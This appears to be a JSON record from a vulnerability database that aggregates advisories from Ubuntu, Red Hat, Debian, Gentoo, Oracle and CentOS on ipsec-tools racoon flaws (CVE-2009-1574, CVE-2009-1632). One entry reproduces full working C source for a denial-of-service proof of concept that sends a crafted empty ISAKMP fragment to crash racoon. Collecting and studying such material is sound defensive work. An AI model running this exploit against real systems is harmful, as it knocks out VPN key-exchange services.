&#40;GNU/Linux&#41;\r\n\r\niD8DBQFKCxJqmqjQ0CJFipgRAtNjAKDT/r7mDFhyggR83f/afoLepfmzSACg65He\r\nU78jJGj2oohufDisddD5Y/o=\r\n=pV+P\r\n-----END PGP SIGNATURE-----", "modified": "2009-05-14T00:00:00", "published": "2009-05-14T00:00:00", "id": "SECURITYVULNS:DOC:21827", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21827", "title": "[ MDVSA-2009:112 ] ipsec-tools", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "description": "NULL pointer dereference on fragmented empty packet, multiple memory leaks.", "modified": "2009-05-19T00:00:00", "published": "2009-05-19T00:00:00", "id": "SECURITYVULNS:VULN:9909", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9909", "title": "ipsec-tools DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:53:26", "bulletinFamily": "exploit", "description": "ipsec-tools racoon frag-isakmp Denial of Service PoC. CVE-2009-1574. Dos exploits for multiple platform", "modified": "2009-05-13T00:00:00", "published": "2009-05-13T00:00:00", "id": "EDB-ID:8669", "href": "https://www.exploit-db.com/exploits/8669/", "type": "exploitdb", "title": "ipsec-tools racoon frag-isakmp Denial of Service PoC", "sourceData": "/* racoon-isakmp-dos.c\n *\n * Copyright (c) 2009 by <mu-b@digit-labs.org>\n *\n * ipsec-tools racoon frag-isakmp DoS POC\n * by mu-b - Thu Apr 02 2009\n *\n * - Tested on: ipsec-tools-0.7.1\n *\n * - Private Source Code -DO NOT DISTRIBUTE -\n * http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n\n#include <string.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <netdb.h>\n#include <sys/types.h>\n\n#define DEF_PORT 500\n#define PORT_ISAKMP DEF_PORT\n\n#define ISAKMP_VERSION_NUMBER 0x10\n#define ISAKMP_ETYPE_BASE 1 /* Base */\n\n/* Frag does not seems to be documented */\n#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */\n\n/* flags */\n#define ISAKMP_FRAG_LAST 1\n\ntypedef u_char cookie_t[8];\n\n/* 3.1 ISAKMP Header Format */\nstruct isakmp {\n cookie_t i_ck; /* Initiator Cookie */\n cookie_t r_ck; /* Responder Cookie */\n unsigned char np; /* Next Payload Type */\n unsigned char v;\n unsigned char etype; /* Exchange Type */\n unsigned char flags; /* Flags */\n unsigned int msgid;\n unsigned int len; /* Length */\n};\n\n/* IKE fragmentation payload */\nstruct isakmp_frag {\n unsigned short unknown0; /* always set to zero? */\n unsigned short len;\n unsigned short unknown1; /* always set to 1? */\n unsigned char index;\n unsigned char flags;\n};\n\n/* used to verify the r_ck. */\nstatic u_char r_ck0[] = { 0,0,0,0,0,0,0,0 };\n\nstatic void\nisa_kmp_dos (char *host)\n{\n char buf[sizeof (struct isakmp) +\n sizeof (struct isakmp_frag)];\n struct isakmp *hdr;\n struct isakmp_frag *frag;\n struct sockaddr_in saddr;\n struct hostent *hp;\n int fd, i, len, n;\n\n if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1)\n {\n perror (\"socket()\");\n exit (EXIT_FAILURE);\n }\n\n if ((hp = gethostbyname (host)) == NULL)\n {\n perror (\"gethostbyname()\");\n exit (EXIT_FAILURE);\n }\n\n memset (&saddr, 0, sizeof saddr);\n memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length);\n saddr.sin_family = AF_INET;\n saddr.sin_port = htons (PORT_ISAKMP);\n\n /* formulate request */\n memset (buf, 0, sizeof (buf));\n\n hdr = (struct isakmp *) buf;\n frag = (struct isakmp_frag *) (hdr + 1);\n\n for (i = 0; i < sizeof (hdr->i_ck); i++)\n hdr->i_ck[i] = (rand () % 255) + 1;\n\n memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck));\n hdr->v = ISAKMP_VERSION_NUMBER;\n hdr->flags = 0;\n hdr->etype = ISAKMP_ETYPE_BASE;\n hdr->msgid = 0;\n hdr->np = ISAKMP_NPTYPE_FRAG;\n\n len = sizeof (struct isakmp) + sizeof (struct isakmp_frag);\n hdr->len = htonl (len);\n\n frag->len = htons (sizeof (struct isakmp_frag));\n frag->index = 1;\n frag->flags = ISAKMP_FRAG_LAST;\n\n n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr);\n if (n < 0 || n != len)\n {\n fprintf (stderr, \"isa_kmp_dos: sendto %d != %d\\n\", n, len);\n exit (EXIT_FAILURE);\n }\n\n close (fd);\n}\n\nint\nmain (int argc, char **argv)\n{\n printf (\"ipsec-tools racoon frag-isakmp DoS PoC\\n\"\n \"by: <mu-b@digit-labs.org>\\n\"\n \"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\\n\\n\");\n\n if (argc <= 1)\n {\n fprintf (stderr, \"Usage: %s <host>\\n\", argv[0]);\n exit (EXIT_SUCCESS);\n }\n\n printf (\"* crashing racoon... \");\n isa_kmp_dos (argv[1]);\n printf (\"done\\n\\n\");\n\n return (EXIT_SUCCESS);\n}\n\n// milw0rm.com [2009-05-13]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8669/"}], "ubuntu": [{"lastseen": "2019-05-29T17:23:03", "bulletinFamily": "unix", "description": "It was discovered that ipsec-tools did not properly handle certain fragmented packets. A remote attacker could send specially crafted packets to the server and cause a denial of service. (CVE-2009-1574)\n\nIt was discovered that ipsec-tools did not properly handle memory usage when verifying certificate signatures or processing nat-traversal keep-alive messages. A remote attacker could send specially crafted packets to the server and exhaust available memory, leading to a denial of service. (CVE-2009-1632)", "modified": "2009-06-09T00:00:00", "published": "2009-06-09T00:00:00", "id": "USN-785-1", "href": "https://usn.ubuntu.com/785-1/", "title": "ipsec-tools vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:56", "bulletinFamily": "unix", "description": "The ipsec-tools package is used in conjunction with the IPsec functionality\nin the Linux kernel and includes racoon, an IKEv1 keying daemon.\n\nA denial of service flaw was found in the ipsec-tools racoon daemon. An\nunauthenticated, remote attacker could trigger a NULL pointer dereference\nthat could cause the racoon daemon to crash. (CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon daemon. If\na remote attacker is able to make multiple connection attempts to the\nracoon daemon, it was possible to cause the racoon daemon to consume all\navailable memory. (CVE-2009-1632)\n\nUsers of ipsec-tools should upgrade to this updated package, which contains\nbackported patches to correct these issues. Users must restart the racoon\ndaemon for this update to take effect.", "modified": "2017-09-08T12:16:34", "published": "2009-05-18T04:00:00", "id": "RHSA-2009:1036", "href": "https://access.redhat.com/errata/RHSA-2009:1036", "type": "redhat", "title": "(RHSA-2009:1036) Important: ipsec-tools security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:00", "bulletinFamily": "unix", "description": "### Background\n\nThe IPSec Tools are a port of KAME's IPsec utilities to the Linux-2.6 IPsec implementation. They include racoon, an Internet Key Exchange daemon for automatically keying IPsec connections. \n\n### Description\n\nThe following vulnerabilities have been found in the racoon daemon as shipped with IPSec Tools: \n\n * Neil Kettle reported that racoon/isakmp_frag.c is prone to a null-pointer dereference (CVE-2009-1574).\n * Multiple memory leaks exist in (1) the eay_check_x509sign() function in racoon/crypto_openssl.c and (2) racoon/nattraversal.c (CVE-2009-1632).\n\n### Impact\n\nA remote attacker could send specially crafted fragmented ISAKMP packets without a payload or exploit vectors related to X.509 certificate authentication and NAT traversal, possibly resulting in a crash of the racoon daemon. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll IPSec Tools users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-firewall/ipsec-tools-0.7.2\"", "modified": "2009-05-24T00:00:00", "published": "2009-05-24T00:00:00", "id": "GLSA-200905-03", "href": "https://security.gentoo.org/glsa/200905-03", "type": "gentoo", "title": "IPSec Tools: Denial of Service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-10-24T22:44:29", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-1804-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nMay 20th, 2009 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : ipsec-tools\nVulnerability : null pointer dereference, memory leaks\nProblem type : remote\nDebian-specific: no\nDebian bug : 527634 528933\nCVE ID : CVE-2009-1574 CVE-2009-1632\n\nSeveral remote vulnerabilities have been discovered in racoon, the Internet Key\nExchange daemon of ipsec-tools. The The Common Vulnerabilities and Exposures\nproject identified the following problems:\n\nNeil Kettle discovered a NULL pointer dereference on crafted fragmented packets\nthat contain no payload. This results in the daemon crashing which can be used\nfor denial of service attacks (CVE-2009-1574).\n\nVarious memory leaks in the X.509 certificate authentication handling and the\nNAT-Traversal keepalive implementation can result in memory exhaustion and\nthus denial of service (CVE-2009-1632).\n\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 0.6.6-3.1etch3.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.7.1-1.3+lenny2.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:0.7.1-1.5.\n\n\nWe recommend that you upgrade your ipsec-tools packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3.dsc\n Size/MD5 checksum: 722 8b561cf84ac9c46ec07b037ce3ad06f1\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3.diff.gz\n Size/MD5 checksum: 49875 7444fb4ad448ccfffe878801a2b88d2e\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_amd64.deb\n Size/MD5 checksum: 343790 9cee9f8c479a3a2952d2913d7bdc4c5d\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_amd64.deb\n Size/MD5 checksum: 89184 5ccd4554eec28da6d933dc20a8a39393\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_arm.deb\n Size/MD5 checksum: 325706 9ce7988b74bccee252be7dac7ac8b5f7\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_arm.deb\n Size/MD5 checksum: 89748 513ded0e4a33200710444e1bf4ab67d8\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_hppa.deb\n Size/MD5 checksum: 353066 c56644b426ae945ca420d4ca37fc3f2a\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_hppa.deb\n Size/MD5 checksum: 94092 80b46b6fd60e857c84c588432b098957\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_i386.deb\n Size/MD5 checksum: 330258 b905d30958bd5c51d355f286f81b8be1\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_i386.deb\n Size/MD5 checksum: 85046 294ccbc4b51e4942edaeec7cd746dfa3\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_ia64.deb\n Size/MD5 checksum: 113356 111f0daa2075584c100efc9c11ecef73\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_ia64.deb\n Size/MD5 checksum: 468296 bd4d69b5e0d4ee39ec564e1304f7649c\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_mips.deb\n Size/MD5 checksum: 89018 b6af57d65d43a7433132bee9657ba608\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_mips.deb\n Size/MD5 checksum: 344558 aba2d85d5196c2a46555ad9e478d338a\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_mipsel.deb\n Size/MD5 checksum: 346856 97e04d97bdd55f852392d7461bad7f4d\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_mipsel.deb\n Size/MD5 checksum: 90308 9e780cda3df3384d0f1e33637d003f21\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_powerpc.deb\n Size/MD5 checksum: 91048 98174626d8ad1fba940c81001c337a4f\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_powerpc.deb\n Size/MD5 checksum: 337266 9f636e6d8904103b0096a4eed99e9cae\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_s390.deb\n Size/MD5 checksum: 341586 b42ddbad323dcdbd775d502f786ab449\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_s390.deb\n Size/MD5 checksum: 90750 62d4c3e618a6c69d532b8d8d33bb27b9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_sparc.deb\n Size/MD5 checksum: 85710 9f1f526be4f2df4eb64d46023d87c6b3\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_sparc.deb\n Size/MD5 checksum: 317136 38e50e9d97b46b51d12429b9ea727858\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2.diff.gz\n Size/MD5 checksum: 49472 4bc8ba2bd520a7514f2c33021c64e8ce\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1.orig.tar.gz\n Size/MD5 checksum: 1039057 ddff5ec5a06b804ca23dc41268368853\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2.dsc\n Size/MD5 checksum: 1144 46d3f28156ee183512a451588ef414e4\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_alpha.deb\n Size/MD5 checksum: 428532 052c13540da3fab19fdca83e9a389a39\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_alpha.deb\n Size/MD5 checksum: 114088 78065dd99d3732291e8d499383af17d9\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_amd64.deb\n Size/MD5 checksum: 409514 a421f12270f5b22639d67be8d2cc8b4e\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_amd64.deb\n Size/MD5 checksum: 104612 9ec93c697cf64232728d0dd5658efac8\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_arm.deb\n Size/MD5 checksum: 104604 78fa45a7e0503e4ee87e7508294cb0b0\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_arm.deb\n Size/MD5 checksum: 381692 f1943edf9599189d16a2f936fa971abc\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_armel.deb\n Size/MD5 checksum: 387510 63ebe895d019d2362a0a11a0de0842c6\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_armel.deb\n Size/MD5 checksum: 104268 6c224349c910ffce5bb892f2a06dc243\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_i386.deb\n Size/MD5 checksum: 375004 5a43cbb6106d576ab686e9e4eb78c245\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_i386.deb\n Size/MD5 checksum: 99098 6c81df8c4653265f10ad6abf68091329\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_ia64.deb\n Size/MD5 checksum: 131288 dfa8646655028ae53bddad7f41e9f3a4\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_ia64.deb\n Size/MD5 checksum: 544150 8e274b6b73125efe0fa8392398e0c5ea\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_mips.deb\n Size/MD5 checksum: 103502 5bd00dfdef0862a63bb666ed949e26ef\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_mips.deb\n Size/MD5 checksum: 388820 46fc10315192943b912126fe68ffeea9\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_mipsel.deb\n Size/MD5 checksum: 104216 a271cb33c891084479ed441945672f14\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_mipsel.deb\n Size/MD5 checksum: 390562 352f78906e08ddb861053dfed30640bf\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_powerpc.deb\n Size/MD5 checksum: 403162 0210fa37088d78ee9aa53395aa0148e8\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_powerpc.deb\n Size/MD5 checksum: 109438 26f043be5fb248d33b605d1987fa472a\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_s390.deb\n Size/MD5 checksum: 107474 aa6203b0e9e6dacbe39520be6b849eea\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_s390.deb\n Size/MD5 checksum: 399386 e965abdcf32838fff7753e789e703205\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_sparc.deb\n Size/MD5 checksum: 102486 57b2e115a15e08518f00158c1fe36cf2\n http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_sparc.deb\n Size/MD5 checksum: 373916 7e2278ac7b4f0b352814ad2f55b1213a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "modified": "2009-05-20T14:08:37", "published": "2009-05-20T14:08:37", "id": "DEBIAN:DSA-1804-1:C9FF1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00114.html", "title": "[SECURITY] [DSA 1804-1] New ipsec-tools packages fix denial of service", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:13", "bulletinFamily": "unix", "description": "[0.6.5-13.1]\n- fix nul dereference in frag code and some memory leaks (#497990) ", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "ELSA-2009-1036", "href": "http://linux.oracle.com/errata/ELSA-2009-1036.html", "title": "ipsec-tools security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:26:21", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2009:1036\n\n\nThe ipsec-tools package is used in conjunction with the IPsec functionality\nin the Linux kernel and includes racoon, an IKEv1 keying daemon.\n\nA denial of service flaw was found in the ipsec-tools racoon daemon. An\nunauthenticated, remote attacker could trigger a NULL pointer dereference\nthat could cause the racoon daemon to crash. (CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon daemon. If\na remote attacker is able to make multiple connection attempts to the\nracoon daemon, it was possible to cause the racoon daemon to consume all\navailable memory. (CVE-2009-1632)\n\nUsers of ipsec-tools should upgrade to this updated package, which contains\nbackported patches to correct these issues. Users must restart the racoon\ndaemon for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027917.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027918.html\n\n**Affected packages:**\nipsec-tools\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1036.html", "modified": "2009-05-19T15:04:51", "published": "2009-05-19T15:04:50", "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/027918.html", "id": "CESA-2009:1036", "title": "ipsec security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}